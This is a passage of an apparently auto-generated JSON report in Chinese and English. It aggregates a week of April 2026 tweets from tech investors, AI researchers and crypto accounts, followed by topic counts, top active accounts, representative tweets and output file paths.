vs…\n[原文链接](https://nitter.net/eladgil/status/2047364865527075139#m)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://nitter.net/eladgil/status/2047052737762980083#m)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://nitter.net/eladgil/status/2046722094348771758#m)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://nitter.net/eladgil/status/2046695194054320150#m)\n\n---\n\n### ✅ @DavidSacks — David Sacks(10 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://nitter.net/DavidSacks/status/2048502978626113625#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://nitter.net/AndrewKolvet/status/2048417712439689346#m)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://nitter.net/RapidResponse47/status/2048111588930986354#m)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://nitter.net/BoringBiz_/status/2048037985765949537#m)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://nitter.net/elonmusk/status/2047877294476116184#m)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://nitter.net/DavidSacks/status/2047871382923469241#m)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://nitter.net/DavidSacks/status/2047867592790946189#m)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://nitter.net/TheChiefNerd/status/2047842000632713369#m)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://nitter.net/jayplemons/status/2047823154655932696#m)\n\n---\n\n### ✅ @jason — Jason Calacanis(10 条)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://nitter.net/Jason/status/2048580651985604783#m)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://nitter.net/Jason/status/2048487905543237675#m)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://nitter.net/Jason/status/2048465651723882972#m)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://nitter.net/Jason/status/2048463405590225173#m)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://nitter.net/Jason/status/2048450286902235560#m)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://nitter.net/Jason/status/2048437340218044499#m)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://nitter.net/Jason/status/2048436081725464959#m)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://nitter.net/nordin_eth/status/2048399674269213067#m)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://nitter.net/Jason/status/2048249992163242220#m)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://nitter.net/Jason/status/2048247267182658004#m)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(10 条)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764743205134644#m)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764741435179442#m)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://nitter.net/HarryStebbings/status/2048756619622707452#m)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://nitter.net/HarryStebbings/status/2048531257399664920#m)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://nitter.net/HarryStebbings/status/2048486182904852537#m)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://nitter.net/HarryStebbings/status/2048418806867870115#m)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://nitter.net/HarryStebbings/status/2048400836024283246#m)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://nitter.net/HarryStebbings/status/2047792195868967172#m)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://nitter.net/HarryStebbings/status/2047693043080261672#m)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://nitter.net/HarryStebbings/status/2047461264998478113#m)\n\n---\n\n### ⚠️ @lmsqueegie — Lars Nielsen(获取失败)\n\n- 错误: URLError: \n\n### ✅ @david__tian — David Tian(0 条)\n\n---\n\n### ⚠️ @Bitking_ — BTCKing(获取失败)\n\n- 错误: URLError: \n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://nitter.net/CryptoCred/status/2047079463750377958#m)\n\n---\n\n### ✅ @AltcoinBuzz — Altcoin Buzz(0 条)\n\n---\n\n### ✅ @TradingGods — Trading Gods(0 条)\n\n---\n\n### ✅ @Warrior_Trading — Warrior Trading(0 条)\n\n---\n\n### ✅ @ProfTrading — Profitable Trading(0 条)\n\n---\n\n### ✅ @SatoshiBun — Satoshi(10 条)\n\n**[2026-04-25T15:26:45+00:00]**\n> RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look mor…\n[原文链接](https://nitter.net/images_i_love3/status/2048061157685010444#m)\n\n**[2026-04-24T18:45:53+00:00]**\n> RT by @satoshibun: Baby’s first con\n[原文链接](https://nitter.net/Aaron_Margolin/status/2047748882952778044#m)\n\n**[2026-04-24T17:05:22+00:00]**\n> RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!\n[原文链接](https://nitter.net/tokidoki/status/2047723587528782152#m)\n\n**[2026-04-24T16:16:22+00:00]**\n> RT by @satoshibun: Good morning! Rise and shine, gamers!\n[原文链接](https://nitter.net/shopculturefly/status/2047711254379393160#m)\n\n**[2026-04-24T11:40:30+00:00]**\n> Im genuinely this Close to killing myself rn & this Shit happens like Okay\n[原文链接](https://nitter.net/satoshibun/status/2047641832624893993#m)\n\n**[2026-04-24T11:37:16+00:00]**\n> RT @ricemoochie: old pvsm\n[原文链接](https://nitter.net/satoshibun/status/2047641016463712763#m)\n\n**[2026-04-24T11:06:42+00:00]**\n> RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing. I just don't get it\n[原文链接](https://nitter.net/DaCapTainXD/status/2047633324676440561#m)\n\n**[2026-04-24T09:21:13+00:00]**\n> RT by @satoshibun: 😾\n[原文链接](https://nitter.net/aaa___kanato/status/2047606779677376714#m)\n\n**[2026-04-24T08:00:10+00:00]**\n> RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️ ⠀⠀⠀⠀⠀⠀⠀『#文字化化』 ⠀「不思議の国のアリス」テーマ ⠀グラフアート新商品発売決定! ♠️━━━━━━━━━━━━━♥️ 📅5/23~6/5 📍eeo Store 池袋本店 🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&ut…\n[原文链接](https://nitter.net/eeo_store/status/2047586383519531500#m)\n\n**[2026-04-23T18:56:53+00:00]**\n> RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester\n[原文链接](https://nitter.net/breadstickz1/status/2047389262253855041#m)\n\n---\n\n### ⚠️ @直播带逛Tommy — Tommy(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @AndrewYNg — Andrew Ng(0 条)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(10 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://nitter.net/JeffDean/status/2048759102390899142#m)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://nitter.net/TrackGazette/status/2048351736037826877#m)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://nitter.net/JeffDean/status/2047665074471387456#m)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://nitter.net/JeffDean/status/2047408945950802186#m)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://nitter.net/JeffDean/status/2047407537566495033#m)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://nitter.net/JeffDean/status/2047405389856297387#m)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://nitter.net/JeffDean/status/2047403921912873257#m)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://nitter.net/JeffDean/status/2047339995682529313#m)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://nitter.net/ceo_clickhouse/status/2046673188193701901#m)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://nitter.net/NeurIPSConf/status/2046632664493384060#m)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(4 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://nitter.net/soumithchintala/status/2048756358820827564#m)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://nitter.net/hardmaru/status/2047191747793649805#m)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://nitter.net/soumithchintala/status/2046282944139215141#m)\n\n**[2026-04-20T16:32:46+00:00]**\n> The Jensen + @dwarkesh_sp podcast was fantastic. Jensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense …\n[原文链接](https://nitter.net/soumithchintala/status/2046265830908870983#m)\n\n---\n\n### ⚠️ @MikeAI — Michael(获取失败)\n\n- 错误: URLError: \n\n### ✅ @Ronald_vanLoon — Ronald van Loon(10 条)\n\n**[2026-04-27T14:23:11+00:00]**\n> #AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul? by @measure_plan #ArtificialIntelligence #MachineLearning #ML\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m)\n\n**[2026-04-27T13:45:07+00:00]**\n> How poor #Data foundations can undermine #AI success by Joanne Carew @CIOonline Learn more: https://bit.ly/4cGbKSG #MachineLearning #ArtificialIntelligence #DeepLearning #ML\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m)\n\n**[2026-04-27T13:11:07+00:00]**\n> Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intelligent systems around th…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is hybrid. → proprieta…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m)\n\n**[2026-04-27T13:00:19+00:00]**\n> R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestration → secure executi…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m)\n\n**[2026-04-27T13:00:18+00:00]**\n> Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one level up, where AI b…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m)\n\n**[2026-04-27T12:50:08+00:00]**\n> Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m)\n\n**[2026-04-23T06:23:14+00:00]**\n> RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour by @AadityaAnand_11 #Robotics #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m)\n\n**[2026-04-23T05:50:01+00:00]**\n> RT by @Ronald_vanLoon: 12 #AI Terms to Learn by @Python_Dv #ArtificialIntelligence #MachineLearning #ML #MI\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047191242535063594#m)\n\n---\n\n### ✅ @erikbryn — Erik Brynjolfsson(7 条)\n\n**[2026-04-25T03:06:05+00:00]**\n> Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. Here are some of his insights from his visit to my Lab. @FutureJurvetson @Stanford @DigEconLab\n[原文链接](https://nitter.net/erikbryn/status/2047874760542200042#m)\n\n**[2026-04-24T23:32:43+00:00]**\n> RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional e…\n[原文链接](https://nitter.net/RonnieChatterji/status/2047821064437424288#m)\n\n**[2026-04-23T18:14:10+00:00]**\n> RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global econ…\n[原文链接](https://nitter.net/DigEconLab/status/2047378514240999569#m)\n\n**[2026-04-22T01:22:04+00:00]**\n> RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea! Your optimistic take on the value that humans will continue to deliver was so refreshing.\n[原文链接](https://nitter.net/TejuAdeyinka/status/2046761422148018260#m)\n\n**[2026-04-21T21:13:05+00:00]**\n> RT by @erikbryn: How do AI agents influence knowledge work? @SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three p…\n[原文链接](https://nitter.net/DigEconLab/status/2046698761221783753#m)\n\n**[2026-04-21T17:10:57+00:00]**\n> RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323 class at @Stanford today. Questions?\n[原文链接](https://nitter.net/saranormous/status/2046637828025835983#m)\n\n**[2026-04-20T15:07:11+00:00]**\n> Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others.…\n[原文链接](https://nitter.net/erikbryn/status/2046244291945927102#m)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://nitter.net/liuliu/status/2047527371486658814#m)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://nitter.net/liuliu/status/2047374234004115719#m)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://nitter.net/liuliu/status/2046986486629986435#m)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @王川 — 王川(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @老胡 — 老胡(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @比特币超级玩家 — 超级玩家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T14:36:21.455665+00:00\n**分析账号**: 33个 | **活跃账号**: 17个 | **推文总量**: 145条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:100 条\n- **模型能力**:27 条\n- **投融资与并购**:8 条\n- **交易与市场**:7 条\n- **算力与芯片**:3 条\n\n## 三、活跃账号 Top10\n\n- @GaryMarcus: 10 条\n- @Ronald_vanLoon: 10 条\n- @HarryStebbings: 10 条\n- @JeffDean: 10 条\n- @sama: 10 条\n- @paulg: 10 条\n- @elonmusk: 10 条\n- @jason: 10 条\n- @DavidSacks: 10 条\n- @ylecun: 10 条\n\n## 四、代表性推文\n\n- @GaryMarcus | 2026-04-27T14:27:36+00:00\n - yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to…\n - https://nitter.net/GaryMarcus/status/2048771044987777428#m\n- @Ronald_vanLoon | 2026-04-27T14:23:11+00:00\n - #AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul? by @measure_plan #ArtificialIntelligence #MachineLearning #ML\n - https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-4…\n - https://nitter.net/HarryStebbings/status/2048764743205134644#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is …\n - https://nitter.net/HarryStebbings/status/2048764741435179442#m\n- @Ronald_vanLoon | 2026-04-27T13:45:07+00:00\n - How poor #Data foundations can undermine #AI success by Joanne Carew @CIOonline Learn more: https://bit.ly/4cGbKSG #MachineLearning #ArtificialIntelligence #DeepLearning #ML\n - https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m\n- @JeffDean | 2026-04-27T13:40:08+00:00\n - The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conve…\n - https://nitter.net/JeffDean/status/2048759102390899142#m\n- @GaryMarcus | 2026-04-27T13:32:43+00:00\n - ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT a…\n - https://nitter.net/GaryMarcus/status/2048757233174122827#m\n- @HarryStebbings | 2026-04-27T13:30:16+00:00\n - Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. A…\n - https://nitter.net/HarryStebbings/status/2048756619622707452#m\n- @soumithchintala | 2026-04-27T13:29:14+00:00\n - This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternat…\n - https://nitter.net/soumithchintala/status/2048756358820827564#m\n- @sama | 2026-04-27T13:24:26+00:00\n - we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.…\n - https://nitter.net/sama/status/2048755148361707946#m\n- @Ronald_vanLoon | 2026-04-27T13:11:07+00:00\n - Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m\n- @sama | 2026-04-27T13:09:30+00:00\n - this is so good: https://paulgraham.com/kids.html\n - https://nitter.net/sama/status/2048751392031203544#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intellige…\n - https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is…\n - https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m\n- @Ronald_vanLoon | 2026-04-27T13:00:19+00:00\n - R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestrat…\n - https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m\n- @Ronald_vanLoon | 2026-04-27T13:00:18+00:00\n - Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one …\n - https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m\n- @Ronald_vanLoon | 2026-04-27T12:50:08+00:00\n - Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m\n- @GaryMarcus | 2026-04-27T12:48:41+00:00\n - R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n - https://nitter.net/GaryMarcus/status/2048746152749846549#m\n- @GaryMarcus | 2026-04-27T12:36:05+00:00\n - People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, wi…\n - https://nitter.net/GaryMarcus/status/2048742983684784239#m\n- @GaryMarcus | 2026-04-27T12:20:17+00:00\n - “Vibe coded disasters piling up on Reddit”\n - https://nitter.net/GaryMarcus/status/2048739005525877072#m\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_153926.json b/data/x_brief/history/20260427_153926.json new file mode 100644 index 0000000..fb2e37a --- /dev/null +++ b/data/x_brief/history/20260427_153926.json @@ -0,0 +1,3067 @@ +{ + "generated_at": "2026-04-27T15:26:27.149133+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/关注列表.md", + "watchers": [ + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "andrejkarpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "lmsqueegie", + "name": "Lars Nielsen" + }, + { + "handle": "david__tian", + "name": "David Tian" + }, + { + "handle": "Bitking_", + "name": "BTCKing" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "Altcoin Buzz" + }, + { + "handle": "TradingGods", + "name": "Trading Gods" + }, + { + "handle": "Warrior_Trading", + "name": "Warrior Trading" + }, + { + "handle": "ProfTrading", + "name": "Profitable Trading" + }, + { + "handle": "SatoshiBun", + "name": "Satoshi" + }, + { + "handle": "直播带逛Tommy", + "name": "Tommy" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "MikeAI", + "name": "Michael" + }, + { + "handle": "Ronald_vanLoon", + "name": "Ronald van Loon" + }, + { + "handle": "erikbryn", + "name": "Erik Brynjolfsson" + }, + { + "handle": "liuliu", + "name": "刘进" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "王川", + "name": "王川" + }, + { + "handle": "老胡", + "name": "老胡" + }, + { + "handle": "比特币超级玩家", + "name": "超级玩家" + } + ], + "days": 7, + "per_account_limit": 30 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 242 + }, + "period": { + "days": 7, + "start_utc": "2026-04-20T15:25:39.828547+00:00", + "end_utc": "2026-04-27T15:26:27.149133+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 33, + "active_accounts": 17, + "total_tweets": 242, + "failed_accounts": 4, + "source_hits": { + "nitter": 24 + }, + "source_errors": { + "nitter": 4, + 